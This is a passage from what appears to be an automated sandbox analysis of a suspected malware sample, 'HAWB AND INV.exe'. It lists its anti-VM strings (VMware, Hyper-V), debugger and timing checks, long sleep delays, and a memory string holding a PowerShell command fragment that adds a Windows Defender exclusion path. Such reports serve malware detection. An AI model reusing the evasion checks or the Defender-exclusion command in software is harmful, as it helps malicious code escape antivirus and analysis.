          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_009745A8 sldt word ptr [eax]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4137
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3031
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4167
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2752
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4731
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1801
          Source: C:\Users\user\Desktop\HAWB AND INV.exe TID: 6756Thread sleep time: -101846s >= -30000s
          Source: C:\Users\user\Desktop\HAWB AND INV.exe TID: 6796Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6844Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep count: 4167 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep count: 2752 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4532Thread sleep count: 43 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5536Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940Thread sleep count: 4731 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940Thread sleep count: 1801 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5688Thread sleep count: 47 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6876Thread sleep time: -22136092888451448s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\HAWB AND INV.exeThread delayed: delay time: 101846
          Source: C:\Users\user\Desktop\HAWB AND INV.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: powershell.exe, 00000004.00000003.475227153.00000000059ED000.00000004.00000001.sdmp, powershell.exe, 00000008.00000003.539404811.0000000005332000.00000004.00000001.sdmpBinary or memory string: Hyper-V
          Source: explorer.exe, 0000000B.00000000.410165765.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000B.00000000.410406652.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000002.615205318.00000000062E0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: explorer.exe, 0000000B.00000000.396565510.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 0000000B.00000000.396565510.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.410165765.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000000B.00000000.407965163.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000B.00000000.407965163.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000000B.00000000.410406652.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: powershell.exe, 00000004.00000003.475227153.00000000059ED000.00000004.00000001.sdmp, powershell.exe, 00000008.00000003.539404811.0000000005332000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: explorer.exe, 0000000B.00000000.390572167.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 0000000B.00000002.594031738.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01292073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01253884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01253884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01203B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01203B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01214A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01214A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0121927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01264257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0125A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01213D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01253540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01201DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01201DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01201DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120FD9B mov eax, dword ptr fs:[00000030h]
